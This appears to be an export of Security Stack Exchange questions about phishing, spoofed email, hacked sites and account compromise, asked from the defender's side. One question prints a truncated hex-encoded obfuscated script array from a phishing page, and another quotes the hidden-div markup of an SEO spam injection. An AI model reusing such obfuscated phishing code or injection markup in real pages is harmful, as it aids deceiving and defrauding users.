    <t>&lt;p&gt;This may sound dumb to a Security pro, but this is about end-users and worst case interaction with a challenge-response. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Background&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Many 2 factor authentication sites request verification of the last 4 digits of a phone number. This is unique in the US, because our phone number format is (xxx) xxx - xxxx. (other countries may not have this culture format)&lt;/p&gt;
 &lt;p&gt;I have witnessed a number of login failures from legitimate users and suspect they are using another common 4 digit code instead of their phone number. &lt;/p&gt;
 &lt;p&gt;I have no desire to inadvertently collect SSNs in my logfile, and it's possible malicious actors could try to collect this information by using a similar scheme (in the guise of resetting a password).&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Question&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Does empirical evidence exist to suggest that a user population may enter SSNs in the phone number entry field? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;information-gathering&gt;&lt;password-reset&gt;</t>
  </si>
  <si>
    <t>Is 'account-security-noreply@accountprotection.microsoft.com' a legitimate sender of security alerts?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have been getting emails from "account-security-noreply@accountprotection.microsoft.com" (as verified in metadata) about unusual activity. The internet has very conflicting information about if these emails are legitimate or not. Microsoft's &lt;a href="https://support.microsoft.com/en-us/help/13967/microsoft-account-unusual-sign-in" rel="nofollow noreferrer"&gt;own website&lt;/a&gt; says this is their legitimate sender address for account activity alerts.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;A legitimate email message should originate from the Microsoft account team at account-security-noreply@accountprotection.microsoft.com.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;But &lt;a href="https://frontpage.gcsu.edu/announcement/phishing-alert-appears-be-microsoft" rel="nofollow noreferrer"&gt;here&lt;/a&gt;, the Georgia College help desk lists this exact email, from that exact sender address, as a phishing attempt.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Many people at GC are receiving one of the more popular phishing scam emails. It appears to be from Microsoft, a ‚ÄúSecurity Alert‚Äù
  wanting you to revalidate your account. Know that this is not from
  Microsoft. It‚Äôs a very elaborate phish. Do not click on any link in
  this email. Please delete it. If you did click on the email, please
  reset you Unify password (and subsequent email password) at
  password.gcsu.edu.&lt;/p&gt;
  &lt;p&gt;¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠¬≠From: Microsoft account team
  account-security-noreply@accountprotection.microsoft.com&lt;/p&gt;
  &lt;p&gt;Sent: Monday, April 3, 2017 3:36 AM&lt;/p&gt;
  &lt;p&gt;Subject: Microsoft account security alert&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Other places online have similarly conflicting info. Some places list these emails as scams, but the example screenshot has a different sender address that is missing the "microsoft.com" from the domain, which looks more fake.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;So which is it? Are those emails from exactly "account-security-noreply@accountprotection.microsoft.com" fake, or not?&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;microsoft&gt;</t>
  </si>
  <si>
    <t>supercobra</t>
  </si>
  <si>
    <t>Where to report malicious URLs, phishing, and malicious web sites?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently discovered that my web site was hacked: there was a hidden HTML &lt;code&gt;div&lt;/code&gt; that's about selling shoes...! I googled the text in question and voila: thousands of sites have been hacked.&lt;/p&gt;
 &lt;p&gt;Check this out: &lt;a href="http://www.google.com/search?q=%22There+is+also+hang+tag+made+of+leather,+a+slip+pocket+to+put+cards%22"&gt;Google the text &lt;em&gt;'There is also hang tag made of leather, a slip pocket to put cards'&lt;/em&gt;&lt;/a&gt; and go to the sites in the results and look at the source code of the page. &lt;/p&gt;
 &lt;p&gt;You'll see something like: &lt;code&gt;&amp;lt;div style="position: absolute; top: -966px;left: -966px&amp;gt;...&amp;lt;/div&amp;gt;&lt;/code&gt; with a lot of spammy shoe keywords in there.&lt;/p&gt;
 &lt;p&gt;Example of hacked site:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Some band page: &lt;a href="http://www.milsteinmusic.com/about.html"&gt;http://www.milsteinmusic.com/about.html&lt;/a&gt; (In case that should be cleaned up: Shoe-ized version archived &lt;a href="https://archive.is/0TdYi"&gt;here&lt;/a&gt;.) (check out the page HTML and look for shoes...).&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;My question is: &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;How did this happen? &lt;/li&gt;
 &lt;li&gt;How can we contact all those guys who have been hacked? &lt;/li&gt;
 &lt;li&gt;Where can I report this to an authority? &lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;exploit&gt;&lt;webserver&gt;&lt;phishing&gt;&lt;disclosure&gt;</t>
  </si>
  <si>
    <t>Why can't my email server automatically identify spoofed addresses?</t>
  </si>
  <si>
    <t>&lt;p&gt;I get this question from business stakeholders a lot, and I have tried to solve this problem on my own. I have a potential approach, but I want to challenge my assumptions.&lt;/p&gt;
 &lt;p&gt;In my mind, it should be trivial to parse an email header to identify a spoofed address by comparing the fields:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;alias: "John Smith"&lt;/li&gt;
 &lt;li&gt;&lt;code&gt;from&lt;/code&gt;: jsmith@example.com&lt;/li&gt;
 &lt;li&gt;&lt;code&gt;reply-to&lt;/code&gt;: jsmith@example.com, or even, group@example.com&lt;/li&gt;
 &lt;li&gt;&lt;code&gt;Received&lt;/code&gt;: a server-generated address&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;100% of the phishing incidents I investigate, there is an obvious mis-match in the 4 fields because the attacker manually specified at least one of the first 3 fields. Any mix of the internal or receiver's corporate domain with external domains is a flag. An alias that looks like an email that does not match the &lt;code&gt;from&lt;/code&gt; and &lt;code&gt;reply-to&lt;/code&gt; is a flag.&lt;/p&gt;
 &lt;p&gt;But the complexity comes in when the email is:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;part of a chain&lt;/li&gt;
 &lt;li&gt;forwarded&lt;/li&gt;
 &lt;li&gt;sent to multiple people&lt;/li&gt;
 &lt;li&gt;sent from a email managing service&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Figuring out which emails are spoofed can become tricky in these cases, but none of the above conditions exist in my investigations. For instance, a spoofed email or phishing attempt has always been an initial contact from a single outside source. Email managing services are known and easy to whitelist &lt;/p&gt;
 &lt;p&gt;If this continues to be the case, wouldn't it be trivial to identify and alert on spoofed emails? You have two header fields to parse (&lt;code&gt;from&lt;/code&gt; and &lt;code&gt;reply-to&lt;/code&gt;), and their contents are predictable and straightforward enough to create a simple regex to test against the alias and &lt;code&gt;Received&lt;/code&gt; fields. &lt;/p&gt;
 &lt;p&gt;Am I missing an element in my assumptions? &lt;/p&gt;</t>
  </si>
  <si>
    <t>Conducting a succesful phishing test</t>
  </si>
  <si>
    <t>&lt;p&gt;How do you usually conduct a safe phishing exercise to test the staff's security awareness? How do you ensure that staff are not offended by such an exercise? Would you in some circumstances also include the CEO without letting him/her know about it? &lt;/p&gt;
 &lt;p&gt;I think in some areas it's quite a controversial thing to do in an organization. I am trying to find out if it's suitable for us to perform one for our organization to raise awareness.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How does the Emotet trojan activates its remote copies?</t>
  </si>
  <si>
    <t>&lt;p&gt;The Emotet trojan is active again and I read a bit about &lt;a href="https://www.malwarebytes.com/emotet/" rel="nofollow noreferrer"&gt;how it propagates&lt;/a&gt;. This includes phishing and having users launch all kind of files (exes, fiels with macros, ...) - a typical method.&lt;/p&gt;
 &lt;p&gt;It also scans the network for writable shares (where it can copy itself) and tries to brute force accounts.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Since it does not seem to use vulnerabilities to activate the remote copy &lt;sup&gt;(*)&lt;/sup&gt;, how does it activates itself in a massive way?&lt;/strong&gt;&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;&lt;sub&gt;(*) an &lt;a href="https://security.stackexchange.com/a/218650/6341"&gt;answer to a similar question&lt;/a&gt; suggests this as a vector, but see &lt;em&gt;How does Emotet spread?&lt;/em&gt; in the &lt;a href="https://www.malwarebytes.com/emotet/" rel="nofollow noreferrer"&gt;first linked article&lt;/a&gt;&lt;/sub&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;virus&gt;&lt;trojan&gt;&lt;emotet&gt;</t>
  </si>
  <si>
    <t>user27014</t>
  </si>
  <si>
    <t>Strange unsolicited email sent to almost never used email address</t>
  </si>
  <si>
    <t>&lt;p&gt;What initially looked like typical spam now seems extra odd and is bugging me (only figuratively I hope).&lt;/p&gt;
 &lt;p&gt;Ostensibly, a sales rep from DomainNameSales.com (DNS), which I'd never heard of, sent an unsolicited sales pitch to an &lt;strong&gt;almost-never used email address of mine&lt;/strong&gt; offering a domain name for sale I'd never considered.&lt;/p&gt;
 &lt;p&gt;Among bottom-feeder types, i.e., the world of hording and selling domain names, this group seems somewhat legit, but I can't figure out how the heck they got my weird email address I'd forgotten. Searching the web for this odd address yielded zero results in DuckDuckGo and Google. I apparently configured the acct years ago to forward to an active address of mine, which labeled the forwarded email and made the spam stand out like a sore thumb in my inbox. &lt;/p&gt;
 &lt;p&gt;I checked the real contact info for corresponding private whois domains I manage and confirmed I hadn't used the odd address there. Now I wonder if my old odd email acct was hacked (I didn't know its password and failed to answer the security questions but regained control via its parent email acct).&lt;/p&gt;
 &lt;p&gt;Meanwhile, the same salesperson from domainnamesales has sent 4 or 5 messages to the same odd address asking me to make an offer. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;This smells exceptionally bad because (1) I've never received any other email at this address before including spam! and (2) the offered domain is plausibly related to my real name even though the body's salutation has the wrong first and last name.&lt;/strong&gt; &lt;/p&gt;
 &lt;p&gt;It's creeping me out like it's a &lt;strong&gt;spear phishing&lt;/strong&gt; campaign. &lt;/p&gt;
 &lt;p&gt;Anyone else seen this? I searched domain-name forums (yuck) and couldn't find anything about this under "warnings" and "scams." &lt;/p&gt;
 &lt;p&gt;If it wasn't for the address they sent it to, I would've just trashed and ignored the messages. It's like receiving a forwarded package addressed to an abandoned cabin you bought but only used once or twice 6 years ago.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Are there remote exploits that are easier to perpetrate than installing a keylogger on a standard win10 laptop?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm trying to improve my wife's password hygiene, and have now finally got her to use different passwords for different sites. She now has trouble remembering to keep the book of them to hand. She flatly refuses to learn to use another program, like KeePass (Excel, Zoom and a web browser are pretty much her limit).&lt;/p&gt;
 &lt;p&gt;Even using a password manager, malicious installation of a keylogger would be game over for bank details and the like.&lt;/p&gt;
 &lt;p&gt;System and use. ADSL router with its standard 'firewall', wifi to several machines including her win10, with the standard Microsoft Security running on it, updates accepted when offered, but no third party antivirus. No illegal or even unusual browsing done on it, it's just used for online shopping, banking, facebook and zoom. It doesn't leave the house, and doesn't get used with random USB sticks. She seems reasonably savvy about phishing, and often asks for my approval before opening emails. I am the only admin user on it.&lt;/p&gt;
 &lt;p&gt;What exploits could access a simple unencrypted notepad file of passwords on her machine? How much more dangerous is that to have than an encrypted file or a password manager? The only one that springs to mind is having the machine stolen or lost, unless it's possible to remotely access files without actually installing software.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;password-management&gt;&lt;windows-10&gt;</t>
  </si>
  <si>
    <t>"Secure" emails from unfamiliar source(s)</t>
  </si>
  <si>
    <t>&lt;p&gt;The context is long, so I'll ask my question first.&lt;/p&gt;
 &lt;p&gt;If an encrypted message is received from an unfamiliar sender &lt;strong&gt;and it's spam&lt;/strong&gt;, how can I avoid receiving further messages of the same sort?&lt;/p&gt;
 &lt;p&gt;If it's a wrong address and not spam, I can simply respond to clarify the situation. But how can I tell whether it's spam or a wrong address?&lt;/p&gt;
 &lt;p&gt;I have a hunch that there's simply nothing to be done. Although, at the very least, guidance on whether to delete or mark as spam would be appreciated.&lt;/p&gt;
 &lt;p&gt;Some details:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;I'm using Gmail.&lt;/li&gt;
 &lt;li&gt;The services used to deliver these messages (Cisco Registered Envelope Service and Proofpoint Encryption) seem to be on the up-and-up.&lt;/li&gt;
 &lt;li&gt;Each message comes from a different name that I'm not familiar with. The user parts of the email addresses happen to be formatted similarly to mine, with a dot between first and last name.&lt;/li&gt;
 &lt;li&gt;The email messages state that I should disregard them if they're not for me. No recipient information is provided beyond the To: address, so I don't &lt;em&gt;really&lt;/em&gt; know whether they are.&lt;/li&gt;
 &lt;li&gt;I have no reason to expect that someone in the healthcare industry is desperately trying to contact me confidentially.&lt;/li&gt;
 &lt;li&gt;If these messages are not for me, I want them to stop. They get past the spam filters and are irritating. (Mostly they are irritating because they are actually addressed to my mother's inbox, so they get priority treatment.)&lt;/li&gt;
 &lt;li&gt;Would I even be able to read the messages if they are not for me? I.e., would these services require additional information, or would receiving the message be sufficient to read it?&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I recently received the following message, apparently from someone at &lt;a href="http://usap.com/" rel="nofollow"&gt;US Anesthesia Partners&lt;/a&gt; via Cisco Registered Envelope Service. I marked it as spam and forgot about it.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;[From/To and boring info about time received]
 Message-Id: &amp;lt;d0efcd$3vukp@iron01server.usap.com&amp;gt;
 Content-Type: multipart/mixed; boundary="===============4057323444299023882=="
 MIME-Version: 1.0
 Date: 02 Dec 2015 11:54:46 -0600
 Subject: SECURED
 --===============4057323444299023882==
 Content-Type: multipart/alternative; boundary="===============7485819488709674644=="
 MIME-Version: 1.0
 --===============7485819488709674644==
 Content-Type: text/plain; charset="us-ascii"
 MIME-Version: 1.0
 Content-Transfer-Encoding: 7bit
 You have received a secure message.
 Read your secure message by opening the attachment, securedoc.html. You
 will be prompted to open (view) the file or save (download) it to your
 computer. For best results, save the file first, then open it in a Web
 browser. To access from a mobile device, forward this message to
 mobile@res.cisco.com to receive a mobile login URL.
 If you have concerns about the validity of this message, contact the sender
 directly.
 First time users - will need to register after opening the attachment. For more
 information, click the following Help link.
 Help - https://res.cisco.com/websafe/help?topic=RegEnvelope
 About Cisco Registered Email Service - https://res.cisco.com/websafe/about"&amp;gt;https://res.cisco.com/websafe/about
 [full HTML version of the above, and an encrypted attachment]
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Now I have another one. This time, it claims to be from the IT department (per the image header) of &lt;a href="http://hcahealthcare.com/" rel="nofollow"&gt;Hospital Corporation of America&lt;/a&gt;, via Proofpoint Encryption. The attachment link also happens to point to the legitimate-looking domain securemail.medcity.net.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;[recipient address and boring info about time received]
 Thread-Topic: &amp;lt;ENCRYPT&amp;gt;
 Thread-Index: AdEzYsV/+0KIoAD4Rt2LdFw5Lb63sw==
 Date: Thu, 10 Dec 2015 15:52:29 +0000
 Message-ID: &amp;lt;ABB9DC19260B3144A2214C004AE02EEC16876627@FWDCWPMSGHCMD3A.hca.corpad.net&amp;gt;
 Accept-Language: en-US
 Content-Language: en-US
 X-MS-Has-Attach: yes
 X-MS-TNEF-Correlator: 
 x-originating-ip: [10.90.32.6]
 X-CFilter-Loop: Reflected
 Subject: 
 Content-Type: multipart/mixed; boundary="PROOFPOINT_BOUNDARY_1"
 X-ProofpointSecure: Encrypted; app="filterd"
 MIME-Version: 1.0
 --PROOFPOINT_BOUNDARY_1
 Content-Type: multipart/alternative; boundary="PROOFPOINT_BOUNDARY_2"
 --PROOFPOINT_BOUNDARY_2
 Content-Type: text/plain; charset="utf-8"
 Content-Transfer-Encoding: 8bit 
 &amp;lt;div style="padding:15px 30px 10px 30px;font-size:16px;color:#555;font-weight:bold;font-family:Verdana, Arial, Helvetica, sans-serif;text-align:center;"&amp;gt; &amp;lt;div align="center"&amp;gt;This is a secure, encrypted message. &amp;lt;/div&amp;gt; &amp;lt;/div&amp;gt; &amp;lt;div style="font-size:14px;color:#FF6417;font-weight:bold;line-height:normal;font-family:Verdana, Arial, Helvetica, sans-serif;padding:0px;margin:0 0 5px;"&amp;gt; &amp;lt;div align="left"&amp;gt;To view your secure message: &amp;lt;/div&amp;gt; &amp;lt;/div&amp;gt; &amp;lt;div style="font-size:12px;color:#2F2E2E;font-weight:normal;line-height:16px;font-family:Verdana, Arial, Helvetica, sans-serif;text-align:left;padding:5px 0px 0px 0px;margin:0px;"&amp;gt; &amp;lt;p style="margin: 0 0 10px;"&amp;gt; Open the attachment (SecureMessageAtt.html) and follow the instructions. &amp;lt;/p&amp;gt; &amp;lt;/div&amp;gt; &amp;lt;div style="font-size:10px;color:#2F2E2E;font-family:Verdana, Arial, Helvetica, sans-serif;padding:0px;margin:0 0 5px;"&amp;gt; &amp;lt;p style="margin: 0 0 10px;"&amp;gt; Use &amp;lt;a href="https://securemail.medcity.net/securereader/help.jsf?lang=enus"&amp;gt;this link&amp;lt;/a&amp;gt; for more information to assist in retrieving your secure message. &amp;lt;/P&amp;gt; &amp;lt;/div&amp;gt; Click here https://securemail.medcity.net/formpostdir/securereader?id=AYXf6oh20zxMEe8%2BN%2B3YHmrJ0Bm7n9UR&amp;amp;brand=7748b5d to read the message on a mobile device or via Outlook Web Access. Please note: The above link will expire 4 days after receipt. 
 [full HTML version of the above, and an encrypted attachment, and a few more "boundaries"]
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;encryption&gt;&lt;email&gt;&lt;spam&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>eBay account compromised/Credit Card used/Hosts files changed</t>
  </si>
  <si>
    <t>&lt;p&gt;To preface this, I'd just like to let you know that I'd consider myself an intermediate security guy(Definitely not a novice, not yet an expert) I do have a story to tell, and would like to know if you guys have any ideas as of what happened.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;1. The call&lt;/strong&gt;
 My friend received a call today(From his supposed credit card company) , that his credit card was charged three days ago on eBay for the amounts of $1, $10, and $40 dollars. He responded to the call right away (He did not give away any personal information about the card or himself, he just gave his address to verify himself and the woman on the phone simply asked him if he had completed the purchases or not.) He of course said that he did not authorize those purchases. He then asked me if I could see why his computer could not access eBay.com.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;2. eBay.com&lt;/strong&gt;
 Typing eBay.com into Chrome was giving him a page not found error(he could access every other website.) He tried on his sons laptop and he could log in just fine. The first thing I did was go to his hosts file. To my surprise (for the first time) there were additional entries in it. There was a list about 30 lines long of eBay domains/sub-domains that were pointing back to localhost. Real fishy.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;3. My advice&lt;/strong&gt;
 He told me that he doesn't believe that his credit card was on file with eBay or PayPal so he didn't know how they could get that information. My advice was to change all of his account passwords and to keep track of his billing statements. I also got rid of all of the eBay hosts file entries to give him a clean slate.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;4. How?&lt;/strong&gt;
 How could this have happened? Just trying to overwrite the hosts file in Windows 7 is a pain. Having to go through Administrative access and all. I told him that it was possibly a phishing attack. I don't know how they got to his hosts file though. All of the hosts file entries were somehow only involving "eBay" and no other retailers. Coincidence? I think not.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;5. His setup, and my question&lt;/strong&gt;
 He has a simple i3 Asus laptop running Windows 7 (I did a clean install when he purchased it 3 weeks ago.) All he uses the laptop for is the internet. Clean Win 7, Google Chrome, and Microsoft Security Essentials with real-time protection turned on. Nothing else. How could this have happened? I'm really clueless. Any feedback is welcome.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;windows&gt;&lt;attack-prevention&gt;&lt;incident-response&gt;</t>
  </si>
  <si>
    <t>Preventing phishing of few critical websites</t>
  </si>
  <si>
    <t>&lt;p&gt;Suppose $S$ is a set of known websites which are very important. Assume there is an anti-phishing tool company $A$ which is aware of such websites. Can the company A reliably develop an anti-phishing tool just to distinguish the websites of set $S$ from its complement $S'$? In other words is it possible for the anti-phishing tool to notify its users if the currently visited website is from set $S$ or set $S'$?&lt;/p&gt;
 &lt;p&gt;I think this problem is relatively easy as the anti-phishing tool has to distinguish between set $S$ of known websites from the complement set $S'$. Or can such anti-phishing tool can be fooled?&lt;/p&gt;
 &lt;p&gt;Another related question:
 Assume that the number of websites over the internet remains same over the time (static) and anti-phishing tool company A knows the set of legitimate websites $S$ and illegitimate websites $S'$. Is it possible to prevent phishing by distinguishing the set $S$ from the set $S'$, for example by blacklisting the sites in $S'$ or by allowing connection only to sites in $S$?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attack-prevention&gt;&lt;phishing&gt;&lt;security-theater&gt;</t>
  </si>
  <si>
    <t>What is a good way to demonstrate the insecurity of common bad practices?</t>
  </si>
  <si>
    <t>&lt;p&gt;A friend of mine teaches a "Basic IT Security" class at a .edu and asked what demonstrations he can do, live, to show why certain practices are bad.&lt;/p&gt;
 &lt;p&gt;Currently, we have cobbled together a Firesheep demo, which is impressive, but it's becoming unreliable as the browser ages (it only works on Firefox 3.6.x) and as more websites handle their cookies properly.&lt;/p&gt;
 &lt;p&gt;Can anyone suggest a good demonstration of why doing X is bad? The more "impressive" to a lay-person, the better&lt;/p&gt;
 &lt;p&gt;So far some ideas have been:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Use wireshark to sniff a password/email that has been insecurely transmitted&lt;/li&gt;
 &lt;li&gt;Show how a phish works from the attackers point of view&lt;/li&gt;
 &lt;li&gt;Perform a dictionary/brute force attack against a weak password&lt;/li&gt;
 &lt;li&gt;Pull the (unencrypted) HDD from a laptop and get some files off it&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;So far we don't think any of these are terribly impressive, from the point of view of a bored Joe Ordinary. Appreciate any suggestions!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;user-education&gt;</t>
  </si>
  <si>
    <t>Is it standard practice to hide where links point in a legitimate email?</t>
  </si>
  <si>
    <t>&lt;p&gt;Someone in our family recently requested a password change for a website (Costco). Soon after requesting, they received an email with the standard &amp;quot;click the link below to reset&amp;quot;, followed by a link.&lt;/p&gt;
 &lt;p&gt;They noticed that the email looked a little sketchy, so they had me look at it (after they had already gone through with the reset). I found that the link they clicked had the text:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;https://www.costco.ca/ResetForgotPassword?token=[a token here]
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;em&gt;But&lt;/em&gt;, when mousing over it, it showed the following (abbreviated) link:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://email-tracking.infobip.com/tracking/1/click/[a different token here]
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;So the email was intentionally hiding where the link went.&lt;/p&gt;
 &lt;p&gt;To me, as someone who's trying to be security minded as I enter the field, this raised some red flags. I can think of three possibilities:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;Since it was the legitimate Costco website (as far as I can tell) that initiated the request, they're deferring password resets to a third-party, and ironically trying to make the email appear more legitimate by masking the link (since &lt;code&gt;http://email-tracking.infobip.com&lt;/code&gt; looks sketchy).&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;The website had been compromised, and they were phishing for email/password combinations, or potentially the ability to buy things on a victim's behalf.&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Our/a DNS server is compromised and the website is illegitimate, for the same reasons as above.&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Is it at all common practice for companies to hide legitimate links? I'm asking because this has always struck me as the kind of thing that I should be on the lookout for when assessing the legitimacy of an email, and this kind of throws a wrench in that thought-process.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>How to add a new webauthn key if the existing one isn't portable</t>
  </si>
  <si>
    <t>&lt;p&gt;Webauthn supports authentication or multi factor authentication with either hardware keys or authentication features that are built into the device used (Windows Hello, Android with a Fingerprint, ...).&lt;/p&gt;
 &lt;p&gt;Given the case that a user registered with a device bound key that can't be used to access the account on a different device and the user does not own a portable key that can be used on all of his devices: How can the user add a second device bound key to his account?&lt;/p&gt;
 &lt;p&gt;The only idea that came to my mind was to allow registering a new key during login if the user authenticates this in a special dialogue on an authenticated device. However this might open the door to phishing attacks where an attacker (who would only need the username in case of direct login using webauthn) asks the user to authenticate while he waits for a key registration request on the login page.&lt;/p&gt;
 &lt;p&gt;The solution would be to use dedicated hardware keys, question is if there is a different way here, e.g. for users that don't have hardware keys but want to use webauthn on a windows laptop and android.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;web-application&gt;&lt;multi-factor&gt;&lt;webauthn&gt;</t>
  </si>
  <si>
    <t>Yahoo Email Keeps Getting Phished</t>
  </si>
  <si>
    <t>&lt;p&gt;I keep getting spam emails from myself (and I am sending them to others as well) on my Yahoo Mail account. I have already went through two password changes which I thought were secure. My very last one had 14 characters (although it consisted of two dictionary words) and a symbol. Is it just a case of my password consistently being cracked, or is something else going on?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;email&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to identify coded content in a phishing page</t>
  </si>
  <si>
    <t>&lt;p&gt;First of all, I'm a completely dummy in information security. Today morning I've received an email that make me curious. It was a kind of phishing page which was not detected by the Gmail's spam filter. So I've downloaded the content to take a look into its code. What I found was simple HTML/JavaScript page with something like this at the footer: &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;function XF(){return new Array('0cd0a85cd81679c246c5a0bb377e5f3b789d0612531b507f4a9dd98ba372219feb0d35d42db5970a21c95428a46ddb18bd664c405e1dd9074f6e0ffdda0cd7f9365337e1baca81c9d73803789c0192093adef61debca1f9525309693700fe45464d57327a2fb449f05b4c0736a71bcf1ffcc66a09e439358cf0d1abf9763f1548ac13a8aed69a52e8a3f15d0d5294f41877d4b5408e95c1286f390bb1bf19c6581b3c17075ebf4733b7224bf275cc8911fc15b359bd195d4f2220ad2ca3991f096f22e32d0ae0a749d921f7bb331a7a07fa31e98f2ea6edf4c996bf82e2eea6664033f1e890023d1bb2fc8b3dbf9ca70bfb9b9063f583d2927f2eeb82c08d130e7c04c2ea8a388750694fbef8a3257944f838446cbfbdd827275e20938288fcb5876608d8d444931c5b03c441e6086aee1111ed0a8366a64e75c38afddf4a6bf70f3583ca7bdf5402f281e62405899c38bcdf51c497cdfdc5951850f5a53d0d0fa7373fa458df3f63ebfff78a2b2a159ad48e1575f55f2adf8a3fc3202dfd15a7c1efe0efec1ceaa69406b3db509bbe596d3ee97e2c365ba7f48fd01ad3035beba46ae443aee287739033c9c9fcf8ec0daf8247931d667a6ab8d8c60cbe627f4b37a5a6ee7bf5de687cdb15c3b6778e6b9af28af9b2306c3f93ffd5588347e293fc61a75263317e3ef10e59f7798a936625d98dae2904186de3aefa1e877af65', ...}
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;UPDATED 1: &lt;a href="http://pastebin.com/hUEKTKzx" rel="nofollow"&gt;Here's the whole code in PasteBin&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;I've just past the first element of the array in order to minimize the code. I can figure that's a hexadecimal array, but I'd like to know how I could decode its content to see what's doing.&lt;/p&gt;
 &lt;p&gt;Any help will be appreciated.&lt;/p&gt;
 &lt;p&gt;UPDATED 2: I was able to convert part of the code back to String and I realized that it's really a ofusqued script. Check: &lt;a href="https://jsfiddle.net/g9hsaj3o/" rel="nofollow"&gt;https://jsfiddle.net/g9hsaj3o/&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>Can you login to Facebook through a VPN or a proxy?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've heard that there's a new type of security in Facebook. When logging in they automatically check if the IP Address is similar to that of the original IP during registration. That's in order to prevent hacking into someone's account via the three methods i.e keylogging, phishing or social engineering.&lt;/p&gt;
 &lt;p&gt;So, since VPNs and proxies change your IP, Facebook might just think that you're intruding in someone's account. I haven't tried it (I will) but I hope it doesn't work :P. Is it possible?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;vpn&gt;&lt;proxy&gt;&lt;facebook&gt;</t>
  </si>
  <si>
    <t>SMS not received and read by somebody else (no SIM swap)?</t>
  </si>
  <si>
    <t>&lt;p&gt;A friend of mine was phished for his credit card details and driving license. Very foolish, I know. The criminals then bought bitcoin. The fact is his card is VbV. He claims not to have received any OTP message, while it was obviously sent. I checked his phone, no trace of any malware, plus he told me that he hadn't been installing any apps for a couple of months at least. None of his apps can read text messages.&lt;/p&gt;
 &lt;p&gt;How is this possible?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;penetration-test&gt;&lt;phishing&gt;&lt;sms&gt;</t>
  </si>
  <si>
    <t>Fell for phishing scam. Is my gmail account with 2-step verification vulnerable?</t>
  </si>
  <si>
    <t>&lt;p&gt;I can't believe it happened to me but I entered Gmail account's user-name and password into a website as part of a phishing scam. I use Gmail's 2-step verification and have changed my password. Is my Gmail account safe?&lt;/p&gt;
 &lt;p&gt;I got an email from a friend suggesting I download a document. We frequently exchange articles but I was suspicious so I emailed him back asking if he had sent me the first email. &lt;/p&gt;
 &lt;p&gt;He responded that he had and, dumb me, mentioning no specific details suggested I would think it was great. "How could a phishing scam respond like that?" I thought. I clicked the link, entered my Gmail username and password on my phone but couldn't access the "article." &lt;/p&gt;
